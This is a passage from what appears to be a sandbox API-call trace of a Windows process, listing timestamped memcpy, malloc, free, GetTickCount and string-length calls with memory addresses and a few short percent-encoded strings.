_Src=0x24adf9b9928, _Size=0x4 | out: _Dst=0x24adf9a5fbc) returned 0x24adf9a5fbc [0102.031] memcpy (in: _Dst=0x24adf9a5fba, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5fba) returned 0x24adf9a5fba [0102.031] memcpy (in: _Dst=0x24adf9a5fb6, _Src=0x24adf9b9788, _Size=0x4 | out: _Dst=0x24adf9a5fb6) returned 0x24adf9a5fb6 [0102.031] memcpy (in: _Dst=0x24adf9a5fb4, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5fb4) returned 0x24adf9a5fb4 [0102.031] memcpy (in: _Dst=0x24adf9a5fb0, _Src=0x24adf9b9768, _Size=0x4 | out: _Dst=0x24adf9a5fb0) returned 0x24adf9a5fb0 [0102.031] memcpy (in: _Dst=0x24adf9a5fae, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5fae) returned 0x24adf9a5fae [0102.031] memcpy (in: _Dst=0x24adf9a5faa, _Src=0x24adf9b9868, _Size=0x4 | out: _Dst=0x24adf9a5faa) returned 0x24adf9a5faa [0102.031] memcpy (in: _Dst=0x24adf9a5fa8, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5fa8) returned 0x24adf9a5fa8 [0102.032] free (_Block=0x24ae148c020) [0102.032] SysStringLen (param_1="%0e%c3%b5%09%21") returned 0xf [0102.032] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae1484e00 [0102.032] memcpy (in: _Dst=0x24adf9bcd28, _Src=0x24ae1484e00, _Size=0x8 | out: _Dst=0x24adf9bcd28) returned 0x24adf9bcd28 [0102.032] free (_Block=0x24ae1484e00) [0102.033] GetTickCount () returned 0x210d7d9 [0102.033] memcpy (in: _Dst=0x24adf9b9b08, _Src=0xd6788fbb30, _Size=0x6 | out: _Dst=0x24adf9b9b08) returned 0x24adf9b9b08 [0102.033] malloc (_Size=0x28) returned 0x24ae148c1a0 [0102.033] GetTickCount () returned 0x210d7d9 [0102.033] memcpy (in: _Dst=0x24adf9a5eae, _Src=0x24ae1a0f85c, _Size=0x14 | out: _Dst=0x24adf9a5eae) returned 0x24adf9a5eae [0102.033] memcpy (in: _Dst=0x24adf9a5ea8, _Src=0x24adf9b9b08, _Size=0x6 | out: _Dst=0x24adf9a5ea8) returned 0x24adf9a5ea8 [0102.034] free (_Block=0x24ae148c1a0) [0102.037] malloc (_Size=0x28) returned 0x24ae148c3e0 [0102.037] GetTickCount () returned 0x210d7e9 [0102.038] malloc (_Size=0x28) returned 0x24ae148bf00 [0102.038] GetTickCount () returned 0x210d7e9 [0102.039] malloc (_Size=0x28) returned 0x24ae148c230 [0102.040] GetTickCount () returned 0x210d7e9 [0102.040] malloc (_Size=0x28) returned 0x24ae148c290 [0102.040] GetTickCount () returned 0x210d7e9 [0102.041] malloc (_Size=0x28) returned 0x24ae148bfc0 [0102.041] GetTickCount () returned 0x210d7e9 [0102.042] malloc (_Size=0x28) returned 0x24ae148c0e0 [0102.043] GetTickCount () returned 0x210d7e9 [0102.043] memcpy (in: _Dst=0x24adf9bd394, _Src=0x24adf9bc0b8, _Size=0x2 | out: _Dst=0x24adf9bd394) returned 0x24adf9bd394 [0102.043] memcpy (in: _Dst=0x24adf9bd392, _Src=0x24adf9bc378, _Size=0x2 | out: _Dst=0x24adf9bd392) returned 0x24adf9bd392 [0102.043] memcpy (in: _Dst=0x24adf9bd390, _Src=0x24adf9bbf38, _Size=0x2 | out: _Dst=0x24adf9bd390) returned 0x24adf9bd390 [0102.043] memcpy (in: _Dst=0x24adf9bd38e, _Src=0x24adf9bc1b8, _Size=0x2 | out: _Dst=0x24adf9bd38e) returned 0x24adf9bd38e [0102.044] memcpy (in: _Dst=0x24adf9bd38c, _Src=0x24adf9bbcb8, _Size=0x2 | out: _Dst=0x24adf9bd38c) returned 0x24adf9bd38c [0102.044] memcpy (in: _Dst=0x24adf9bd38a, _Src=0x24adf9bc278, _Size=0x2 | out: _Dst=0x24adf9bd38a) returned 0x24adf9bd38a [0102.044] memcpy (in: _Dst=0x24adf9bd388, _Src=0x24adf9bbef8, _Size=0x2 | out: _Dst=0x24adf9bd388) returned 0x24adf9bd388 [0102.045] free (_Block=0x24ae148c0e0) [0102.045] GetTickCount () returned 0x210d7e9 [0102.045] GetTickCount () returned 0x210d7e9 [0102.045] memcpy (in: _Dst=0x24adf9bc1f8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9bc1f8) returned 0x24adf9bc1f8 [0102.045] malloc (_Size=0x28) returned 0x24ae148c2c0 [0102.045] GetTickCount () returned 0x210d7e9 [0102.045] memcpy (in: _Dst=0x24adf9bcf3c, _Src=0x24adf9bc1f8, _Size=0x4 | out: _Dst=0x24adf9bcf3c) returned 0x24adf9bcf3c [0102.045] memcpy (in: _Dst=0x24adf9bcf38, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bcf38) returned 0x24adf9bcf38 [0102.046] free (_Block=0x24ae148c2c0) [0102.046] GetTickCount () returned 0x210d7e9 [0102.046] memcpy (in: _Dst=0x24adf9bc078, _Src=0x24adf9bcf3c, _Size=0x4 | out: _Dst=0x24adf9bc078) returned 0x24adf9bc078 [0102.046] malloc (_Size=0x28) returned 0x24ae148c2c0 [0102.046] GetTickCount () returned 0x210d7e9 [0102.046] GetTickCount () returned 0x210d7e9 [0102.047] GetTickCount () returned 0x210d7e9 [0102.047] memcpy (in: _Dst=0x24adf9bc018, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9bc018) returned 0x24adf9bc018 [0102.047] malloc (_Size=0x28) returned 0x24ae148c110 [0102.047] GetTickCount () returned 0x210d7e9 [0102.047] memcpy (in: _Dst=0x24adf9bcf9c, _Src=0x24adf9bc018, _Size=0x4 | out: _Dst=0x24adf9bcf9c) returned 0x24adf9bcf9c [0102.047] memcpy (in: _Dst=0x24adf9bcf98, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bcf98) returned 0x24adf9bcf98 [0102.048] free (_Block=0x24ae148c110) [0102.048] GetTickCount () returned 0x210d7e9 [0102.048] memcpy (in: _Dst=0x24adf9bc198, _Src=0x24adf9bcf9c, _Size=0x4 | out: _Dst=0x24adf9bc198) returned 0x24adf9bc198 [0102.048] malloc (_Size=0x28) returned 0x24ae148c020 [0102.048] GetTickCount () returned 0x210d7e9 [0102.048] malloc (_Size=0x28) returned 0x24ae148c260 [0102.048] GetTickCount () returned 0x210d7e9 [0102.048] GetTickCount () returned 0x210d7e9 [0102.048] GetTickCount () returned 0x210d7e9 [0102.049] memcpy (in: _Dst=0x24adf9bc1d8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9bc1d8) returned 0x24adf9bc1d8 [0102.049] malloc (_Size=0x28) returned 0x24ae148c410 [0102.049] GetTickCount () returned 0x210d7e9 [0102.049] memcpy (in: _Dst=0x24adf9bcf6c, _Src=0x24adf9bc1d8, _Size=0x4 | out: _Dst=0x24adf9bcf6c) returned 0x24adf9bcf6c [0102.049] memcpy (in: _Dst=0x24adf9bcf68, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bcf68) returned 0x24adf9bcf68 [0102.049] free (_Block=0x24ae148c410) [0102.050] GetTickCount () returned 0x210d7f8 [0102.050] memcpy (in: _Dst=0x24adf9bc238, _Src=0x24adf9bcf6c, _Size=0x4 | out: _Dst=0x24adf9bc238) returned 0x24adf9bc238 [0102.050] malloc (_Size=0x28) returned 0x24ae148be10 [0102.050] GetTickCount () returned 0x210d7f8 [0102.050] malloc (_Size=0x28) returned 0x24ae148bf90 [0102.050] GetTickCount () returned 0x210d7f8 [0102.051] GetTickCount () returned 0x210d7f8 [0102.051] GetTickCount () returned 0x210d7f8 [0102.051] memcpy (in: _Dst=0x24adf9bc3b8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9bc3b8) returned 0x24adf9bc3b8 [0102.051] malloc (_Size=0x28) returned 0x24ae148bea0 [0102.051] GetTickCount () returned 0x210d7f8 [0102.051] memcpy (in: _Dst=0x24adf9bd02c, _Src=0x24adf9bc3b8, _Size=0x4 | out: _Dst=0x24adf9bd02c) returned 0x24adf9bd02c [0102.051] memcpy (in: _Dst=0x24adf9bd028, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bd028) returned 0x24adf9bd028 [0102.052] free (_Block=0x24ae148bea0) [0102.052] GetTickCount () returned 0x210d7f8 [0102.052] memcpy (in: _Dst=0x24adf9bbd38, _Src=0x24adf9bd02c, _Size=0x4 | out: _Dst=0x24adf9bbd38) returned 0x24adf9bbd38 [0102.052] malloc (_Size=0x28) returned 0x24ae148c2f0 [0102.052] GetTickCount () returned 0x210d7f8 [0102.052] malloc (_Size=0x28) returned 0x24ae148bd50 [0102.052] GetTickCount () returned 0x210d7f8 [0102.052] GetTickCount () returned 0x210d7f8 [0102.052] GetTickCount () returned 0x210d7f8 [0102.052] memcpy (in: _Dst=0x24adf9bbf18, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9bbf18) returned 0x24adf9bbf18 [0102.052] malloc (_Size=0x28) returned 0x24ae148be70 [0102.052] GetTickCount () returned 0x210d7f8 [0102.053] memcpy (in: _Dst=0x24adf9bd0bc, _Src=0x24adf9bbf18, _Size=0x4 | out: _Dst=0x24adf9bd0bc) returned 0x24adf9bd0bc [0102.053] memcpy (in: _Dst=0x24adf9bd0b8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bd0b8) returned 0x24adf9bd0b8 [0102.054] free (_Block=0x24ae148be70) [0102.054] GetTickCount () returned 0x210d7f8 [0102.054] memcpy (in: _Dst=0x24adf9bc258, _Src=0x24adf9bd0bc, _Size=0x4 | out: _Dst=0x24adf9bc258) returned 0x24adf9bc258 [0102.055] malloc (_Size=0x28) returned 0x24ae148c0b0 [0102.055] GetTickCount () returned 0x210d7f8 [0102.055] malloc (_Size=0x28) returned 0x24ae148bf30 [0102.055] GetTickCount () returned 0x210d7f8 [0102.055] GetTickCount () returned 0x210d7f8 [0102.055] GetTickCount () returned 0x210d7f8 [0102.055] memcpy (in: _Dst=0x24adf9bc298, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9bc298) returned 0x24adf9bc298 [0102.055] malloc (_Size=0x28) returned 0x24ae148c320 [0102.055] GetTickCount () returned 0x210d7f8 [0102.055] memcpy (in: _Dst=0x24adf9bd14c, _Src=0x24adf9bc298, _Size=0x4 | out: _Dst=0x24adf9bd14c) returned 0x24adf9bd14c [0102.055] memcpy (in: _Dst=0x24adf9bd148, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bd148) returned 0x24adf9bd148 [0102.056] free (_Block=0x24ae148c320) [0102.056] GetTickCount () returned 0x210d7f8 [0102.056] memcpy (in: _Dst=0x24adf9bbcd8, _Src=0x24adf9bd14c, _Size=0x4 | out: _Dst=0x24adf9bbcd8) returned 0x24adf9bbcd8 [0102.056] malloc (_Size=0x28) returned 0x24ae148c080 [0102.056] GetTickCount () returned 0x210d7f8 [0102.056] malloc (_Size=0x28) returned 0x24ae148c1d0 [0102.056] GetTickCount () returned 0x210d7f8 [0102.056] GetTickCount () returned 0x210d7f8 [0102.056] GetTickCount () returned 0x210d7f8 [0102.056] memcpy (in: _Dst=0x24adf9bc2b8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9bc2b8) returned 0x24adf9bc2b8 [0102.056] malloc (_Size=0x28) returned 0x24ae148c170 [0102.056] GetTickCount () returned 0x210d7f8 [0102.057] memcpy (in: _Dst=0x24adf9bd2cc, _Src=0x24adf9bc2b8, _Size=0x4 | out: _Dst=0x24adf9bd2cc) returned 0x24adf9bd2cc [0102.057] memcpy (in: _Dst=0x24adf9bd2c8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bd2c8) returned 0x24adf9bd2c8 [0102.057] free (_Block=0x24ae148c170) [0102.057] GetTickCount () returned 0x210d7f8 [0102.057] memcpy (in: _Dst=0x24adf9bc2f8, _Src=0x24adf9bd2cc, _Size=0x4 | out: _Dst=0x24adf9bc2f8) returned 0x24adf9bc2f8 [0102.057] malloc (_Size=0x28) returned 0x24ae148c320 [0102.057] GetTickCount () returned 0x210d7f8 [0102.057] malloc (_Size=0x28) returned 0x24ae148c1a0 [0102.057] GetTickCount () returned 0x210d7f8 [0102.057] memcpy (in: _Dst=0x24adf9acfee, _Src=0x24adf9bc2f8, _Size=0x4 | out: _Dst=0x24adf9acfee) returned 0x24adf9acfee [0102.057] memcpy (in: _Dst=0x24adf9acfec, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9acfec) returned 0x24adf9acfec [0102.057] memcpy (in: _Dst=0x24adf9acfe8, _Src=0x24adf9bbcd8, _Size=0x4 | out: _Dst=0x24adf9acfe8) returned 0x24adf9acfe8 [0102.057] memcpy (in: _Dst=0x24adf9acfe6, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9acfe6) returned 0x24adf9acfe6 [0102.057] memcpy (in: _Dst=0x24adf9acfe2, _Src=0x24adf9bc258, _Size=0x4 | out: _Dst=0x24adf9acfe2) returned 0x24adf9acfe2 [0102.057] memcpy (in: _Dst=0x24adf9acfe0, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9acfe0) returned 0x24adf9acfe0 [0102.057] memcpy (in: _Dst=0x24adf9acfdc, _Src=0x24adf9bbd38, _Size=0x4 | out: _Dst=0x24adf9acfdc) returned 0x24adf9acfdc [0102.058] memcpy (in: _Dst=0x24adf9acfda, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9acfda) returned 0x24adf9acfda [0102.058] memcpy (in: _Dst=0x24adf9acfd6, _Src=0x24adf9bc238, _Size=0x4 | out: _Dst=0x24adf9acfd6) returned 0x24adf9acfd6 [0102.058] memcpy (in: _Dst=0x24adf9acfd4, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9acfd4) returned 0x24adf9acfd4 [0102.058] memcpy (in: _Dst=0x24adf9acfd0, _Src=0x24adf9bc198, _Size=0x4 | out: _Dst=0x24adf9acfd0) returned 0x24adf9acfd0 [0102.058] memcpy (in: _Dst=0x24adf9acfce, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9acfce) returned 0x24adf9acfce [0102.058] memcpy (in: _Dst=0x24adf9acfca, _Src=0x24adf9bc078, _Size=0x4 | out: _Dst=0x24adf9acfca) returned 0x24adf9acfca [0102.058] memcpy (in: _Dst=0x24adf9acfc8, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9acfc8) returned 0x24adf9acfc8 [0102.058] free (_Block=0x24ae148c1a0) [0102.058] SysStringLen (param_1="%c3%a3%7d%c2%86%c3%a9") returned 0x15 [0102.058] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae1484d30 [0102.058] memcpy (in: _Dst=0x24adf9bd2f8, _Src=0x24ae1484d30, _Size=0x8 | out: _Dst=0x24adf9bd2f8) returned 0x24adf9bd2f8 [0102.058] free (_Block=0x24ae1484d30) [0102.058] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ã", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.058] GetTickCount () returned 0x210d7f8 [0102.058] memcpy (in: _Dst=0x24adf9bc318, _Src=0xd6788fbb30, _Size=0x6 | out: _Dst=0x24adf9bc318) returned 0x24adf9bc318 [0102.059] malloc (_Size=0x28) returned 0x24ae148c380 [0102.059] GetTickCount () returned 0x210d7f8 [0102.059] memcpy (in: _Dst=0x24adf9a5fee, _Src=0x24ae1a0f85c, _Size=0x14 | out: _Dst=0x24adf9a5fee) returned 0x24adf9a5fee [0102.059] memcpy (in: _Dst=0x24adf9a5fe8, _Src=0x24adf9bc318, _Size=0x6 | out: _Dst=0x24adf9a5fe8) returned 0x24adf9a5fe8 [0102.059] free (_Block=0x24ae148c380) [0102.059] malloc (_Size=0x70) returned 0x24ae146ffa0 [0102.059] GetTickCount () returned 0x210d7f8 [0102.059] GetTickCount () returned 0x210d7f8 [0102.059] malloc (_Size=0x28) returned 0x24ae148c3b0 [0102.060] GetTickCount () returned 0x210d7f8 [0102.060] malloc (_Size=0x28) returned 0x24ae148c350 [0102.060] GetTickCount () returned 0x210d7f8 [0102.060] GetTickCount () returned 0x210d7f8 [0102.060] malloc (_Size=0x28) returned 0x24ae148bd80 [0102.060] GetTickCount () returned 0x210d7f8 [0102.060] malloc (_Size=0x28) returned 0x24ae148be40 [0102.060] GetTickCount () returned 0x210d7f8 [0102.060] malloc (_Size=0x28) returned 0x24ae148c380 [0102.060] GetTickCount () returned 0x210d7f8 [0102.060] memcpy (in: _Dst=0x24adf9bcd62, _Src=0x24adf9bbfd8, _Size=0x2 | out: _Dst=0x24adf9bcd62) returned 0x24adf9bcd62 [0102.060] memcpy (in: _Dst=0x24adf9bcd60, _Src=0x24adf9bbd78, _Size=0x2 | out: _Dst=0x24adf9bcd60) returned 0x24adf9bcd60 [0102.061] memcpy (in: _Dst=0x24adf9bcd5e, _Src=0x24adf9bc0d8, _Size=0x2 | out: _Dst=0x24adf9bcd5e) returned 0x24adf9bcd5e [0102.061] memcpy (in: _Dst=0x24adf9bcd5c, _Src=0x24adf9bc358, _Size=0x2 | out: _Dst=0x24adf9bcd5c) returned 0x24adf9bcd5c [0102.061] memcpy (in: _Dst=0x24adf9bcd5a, _Src=0x24adf9bc3f8, _Size=0x2 | out: _Dst=0x24adf9bcd5a) returned 0x24adf9bcd5a [0102.061] memcpy (in: _Dst=0x24adf9bcd58, _Src=0x24adf9bc398, _Size=0x2 | out: _Dst=0x24adf9bcd58) returned 0x24adf9bcd58 [0102.061] free (_Block=0x24ae148c380) [0102.061] GetTickCount () returned 0x210d7f8 [0102.061] GetTickCount () returned 0x210d7f8 [0102.061] memcpy (in: _Dst=0x24adf9bbdb8, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9bbdb8) returned 0x24adf9bbdb8 [0102.061] malloc (_Size=0x28) returned 0x24ae148bff0 [0102.061] GetTickCount () returned 0x210d7f8 [0102.061] memcpy (in: _Dst=0x24adf9bcd8c, _Src=0x24adf9bbdb8, _Size=0x4 | out: _Dst=0x24adf9bcd8c) returned 0x24adf9bcd8c [0102.061] memcpy (in: _Dst=0x24adf9bcd88, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bcd88) returned 0x24adf9bcd88 [0102.062] free (_Block=0x24ae148bff0) [0102.062] GetTickCount () returned 0x210d7f8 [0102.062] memcpy (in: _Dst=0x24adf9bbe38, _Src=0x24adf9bcd8c, _Size=0x4 | out: _Dst=0x24adf9bbe38) returned 0x24adf9bbe38 [0102.062] malloc (_Size=0x28) returned 0x24ae148c110 [0102.062] GetTickCount () returned 0x210d7f8 [0102.062] GetTickCount () returned 0x210d7f8 [0102.062] GetTickCount () returned 0x210d7f8 [0102.062] memcpy (in: _Dst=0x24adf9bc118, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9bc118) returned 0x24adf9bc118 [0102.062] malloc (_Size=0x28) returned 0x24ae148bdb0 [0102.062] GetTickCount () returned 0x210d7f8 [0102.062] memcpy (in: _Dst=0x24adf9bd32c, _Src=0x24adf9bc118, _Size=0x4 | out: _Dst=0x24adf9bd32c) returned 0x24adf9bd32c [0102.062] memcpy (in: _Dst=0x24adf9bd328, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bd328) returned 0x24adf9bd328 [0102.063] free (_Block=0x24ae148bdb0) [0102.063] GetTickCount () returned 0x210d7f8 [0102.063] memcpy (in: _Dst=0x24adf9bbe58, _Src=0x24adf9bd32c, _Size=0x4 | out: _Dst=0x24adf9bbe58) returned 0x24adf9bbe58 [0102.063] malloc (_Size=0x28) returned 0x24ae148c470 [0102.063] GetTickCount () returned 0x210d7f8 [0102.063] malloc (_Size=0x28) returned 0x24ae148c140 [0102.063] GetTickCount () returned 0x210d7f8 [0102.063] GetTickCount () returned 0x210d7f8 [0102.063] GetTickCount () returned 0x210d7f8 [0102.063] memcpy (in: _Dst=0x24adf9bbe98, _Src=0xd6788f9a50, _Size=0x2 | out: _Dst=0x24adf9bbe98) returned 0x24adf9bbe98 [0102.063] malloc (_Size=0x28) returned 0x24ae148c410 [0102.063] GetTickCount () returned 0x210d7f8 [0102.063] memcpy (in: _Dst=0x24adf9bbebc, _Src=0x24adf9bbe98, _Size=0x2 | out: _Dst=0x24adf9bbebc) returned 0x24adf9bbebc [0102.063] memcpy (in: _Dst=0x24adf9bbeb8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bbeb8) returned 0x24adf9bbeb8 [0102.064] free (_Block=0x24ae148c410) [0102.064] GetTickCount () returned 0x210d7f8 [0102.064] memcpy (in: _Dst=0x24adf9bbed8, _Src=0x24adf9bbeba, _Size=0x4 | out: _Dst=0x24adf9bbed8) returned 0x24adf9bbed8 [0102.064] malloc (_Size=0x28) returned 0x24ae148c380 [0102.064] GetTickCount () returned 0x210d7f8 [0102.064] malloc (_Size=0x28) returned 0x24ae148bff0 [0102.064] GetTickCount () returned 0x210d7f8 [0102.064] GetTickCount () returned 0x210d7f8 [0102.064] GetTickCount () returned 0x210d7f8 [0102.064] memcpy (in: _Dst=0x24adf9bbf58, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9bbf58) returned 0x24adf9bbf58 [0102.064] malloc (_Size=0x28) returned 0x24ae148bde0 [0102.064] GetTickCount () returned 0x210d7f8 [0102.064] memcpy (in: _Dst=0x24adf9bd3bc, _Src=0x24adf9bbf58, _Size=0x4 | out: _Dst=0x24adf9bd3bc) returned 0x24adf9bd3bc [0102.064] memcpy (in: _Dst=0x24adf9bd3b8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bd3b8) returned 0x24adf9bd3b8 [0102.065] free (_Block=0x24ae148bde0) [0102.065] GetTickCount () returned 0x210d7f8 [0102.065] memcpy (in: _Dst=0x24adf9bbf98, _Src=0x24adf9bd3bc, _Size=0x4 | out: _Dst=0x24adf9bbf98) returned 0x24adf9bbf98 [0102.065] malloc (_Size=0x28) returned 0x24ae148c410 [0102.066] GetTickCount () returned 0x210d808 [0102.067] memcpy (in: _Dst=0x24adf9bbff8, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9bbff8) returned 0x24adf9bbff8 [0102.067] memcpy (in: _Dst=0x24adf9bc54c, _Src=0x24adf9bbff8, _Size=0x4 | out: _Dst=0x24adf9bc54c) returned 0x24adf9bc54c [0102.067] memcpy (in: _Dst=0x24adf9bc548, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bc548) returned 0x24adf9bc548 [0102.067] free (_Block=0x24ae148c050) [0102.067] GetTickCount () returned 0x210d808 [0102.067] memcpy (in: _Dst=0x24adf9bc038, _Src=0x24adf9bc54c, _Size=0x4 | out: _Dst=0x24adf9bc038) returned 0x24adf9bc038 [0102.067] memcpy (in: _Dst=0x24adf9bc058, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9bc058) returned 0x24adf9bc058 [0102.067] memcpy (in: _Dst=0x24adf9bca8c, _Src=0x24adf9bc058, _Size=0x4 | out: _Dst=0x24adf9bca8c) returned 0x24adf9bca8c [0102.067] memcpy (in: _Dst=0x24adf9bca88, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bca88) returned 0x24adf9bca88 [0102.067] free (_Block=0x24ae148c440) [0102.067] GetTickCount () returned 0x210d808 [0102.067] memcpy (in: _Dst=0x24adf9bc138, _Src=0x24adf9bca8c, _Size=0x4 | out: _Dst=0x24adf9bc138) returned 0x24adf9bc138 [0102.068] memcpy (in: _Dst=0x24adf9a5f08, _Src=0x24adf9bc138, _Size=0x4 | out: _Dst=0x24adf9a5f08) returned 0x24adf9a5f08 [0102.068] memcpy (in: _Dst=0x24adf9a5f06, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5f06) returned 0x24adf9a5f06 [0102.068] memcpy (in: _Dst=0x24adf9a5f02, _Src=0x24adf9bc038, _Size=0x4 | out: _Dst=0x24adf9a5f02) returned 0x24adf9a5f02 [0102.068] memcpy (in: _Dst=0x24adf9a5f00, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5f00) returned 0x24adf9a5f00 [0102.068] memcpy (in: _Dst=0x24adf9a5efc, _Src=0x24adf9bbf98, _Size=0x4 | out: _Dst=0x24adf9a5efc) returned 0x24adf9a5efc [0102.068] memcpy (in: _Dst=0x24adf9a5efa, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5efa) returned 0x24adf9a5efa [0102.068] memcpy (in: _Dst=0x24adf9a5ef6, _Src=0x24adf9bbed8, _Size=0x4 | out: _Dst=0x24adf9a5ef6) returned 0x24adf9a5ef6 [0102.068] memcpy (in: _Dst=0x24adf9a5ef4, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5ef4) returned 0x24adf9a5ef4 [0102.068] memcpy (in: _Dst=0x24adf9a5ef0, _Src=0x24adf9bbe58, _Size=0x4 | out: _Dst=0x24adf9a5ef0) returned 0x24adf9a5ef0 [0102.068] memcpy (in: _Dst=0x24adf9a5eee, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5eee) returned 0x24adf9a5eee [0102.068] memcpy (in: _Dst=0x24adf9a5eea, _Src=0x24adf9bbe38, _Size=0x4 | out: _Dst=0x24adf9a5eea) returned 0x24adf9a5eea [0102.068] memcpy (in: _Dst=0x24adf9a5ee8, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5ee8) returned 0x24adf9a5ee8 [0102.068] free (_Block=0x24ae148bdb0) [0102.068] SysStringLen (param_1="%c3%95%03%c3%8d%3b") returned 0x12 [0102.068] memcpy (in: _Dst=0x24adf9bc818, _Src=0x24ae1484b90, _Size=0x8 | out: _Dst=0x24adf9bc818) returned 0x24adf9bc818 [0102.068] free (_Block=0x24ae1484b90) [0102.070] memcpy (in: _Dst=0x24adf9bc4be, _Src=0x24adf9b8df8, _Size=0x2 | out: _Dst=0x24adf9bc4be) returned 0x24adf9bc4be [0102.070] memcpy (in: _Dst=0x24adf9bc4bc, _Src=0x24adf9b9038, _Size=0x2 | out: _Dst=0x24adf9bc4bc) returned 0x24adf9bc4bc [0102.070] memcpy (in: _Dst=0x24adf9bc4ba, _Src=0x24adf9b92d8, _Size=0x2 | out: _Dst=0x24adf9bc4ba) returned 0x24adf9bc4ba [0102.070] memcpy (in: _Dst=0x24adf9bc4b8, _Src=0x24adf9b8f38, _Size=0x2 | out: _Dst=0x24adf9bc4b8) returned 0x24adf9bc4b8 [0102.070] free (_Block=0x24ae148c200) [0102.070] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="¸", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.070] GetTickCount () returned 0x210d808 [0102.070] memcpy (in: _Dst=0x24adf9b9138, _Src=0xd6788fbb30, _Size=0x6 | out: _Dst=0x24adf9b9138) returned 0x24adf9b9138 [0102.070] memcpy (in: _Dst=0x24adf9a60ee, _Src=0x24ae1a0f85c, _Size=0x14 | out: _Dst=0x24adf9a60ee) returned 0x24adf9a60ee [0102.070] memcpy (in: _Dst=0x24adf9a60e8, _Src=0x24adf9b9138, _Size=0x6 | out: _Dst=0x24adf9a60e8) returned 0x24adf9a60e8 [0102.070] free (_Block=0x24ae148c200) [0102.071] memcpy (in: _Dst=0x24adf9bc5ae, _Src=0x24adf9b8d98, _Size=0x2 | out: _Dst=0x24adf9bc5ae) returned 0x24adf9bc5ae [0102.071] memcpy (in: _Dst=0x24adf9bc5ac, _Src=0x24adf9b8f58, _Size=0x2 | out: _Dst=0x24adf9bc5ac) returned 0x24adf9bc5ac [0102.071] memcpy (in: _Dst=0x24adf9bc5aa, _Src=0x24adf9b9338, _Size=0x2 | out: _Dst=0x24adf9bc5aa) returned 0x24adf9bc5aa [0102.071] memcpy (in: _Dst=0x24adf9bc5a8, _Src=0x24adf9b8f98, _Size=0x2 | out: _Dst=0x24adf9bc5a8) returned 0x24adf9bc5a8 [0102.071] free (_Block=0x24ae148c200) [0102.071] GetTickCount () returned 0x210d808 [0102.072] GetTickCount () returned 0x210d808 [0102.072] memcpy (in: _Dst=0x24adf9b9058, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b9058) returned 0x24adf9b9058 [0102.072] memcpy (in: _Dst=0x24adf9bc93c, _Src=0x24adf9b9058, _Size=0x4 | out: _Dst=0x24adf9bc93c) returned 0x24adf9bc93c [0102.072] memcpy (in: _Dst=0x24adf9bc938, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bc938) returned 0x24adf9bc938 [0102.072] free (_Block=0x24ae148be70) [0102.072] GetTickCount () returned 0x210d808 [0102.072] memcpy (in: _Dst=0x24adf9b9198, _Src=0x24adf9bc93c, _Size=0x4 | out: _Dst=0x24adf9b9198) returned 0x24adf9b9198 [0102.072] memcpy (in: _Dst=0x24adf9b8f78, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b8f78) returned 0x24adf9b8f78 [0102.072] memcpy (in: _Dst=0x24adf9bcaec, _Src=0x24adf9b8f78, _Size=0x4 | out: _Dst=0x24adf9bcaec) returned 0x24adf9bcaec [0102.072] memcpy (in: _Dst=0x24adf9bcae8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bcae8) returned 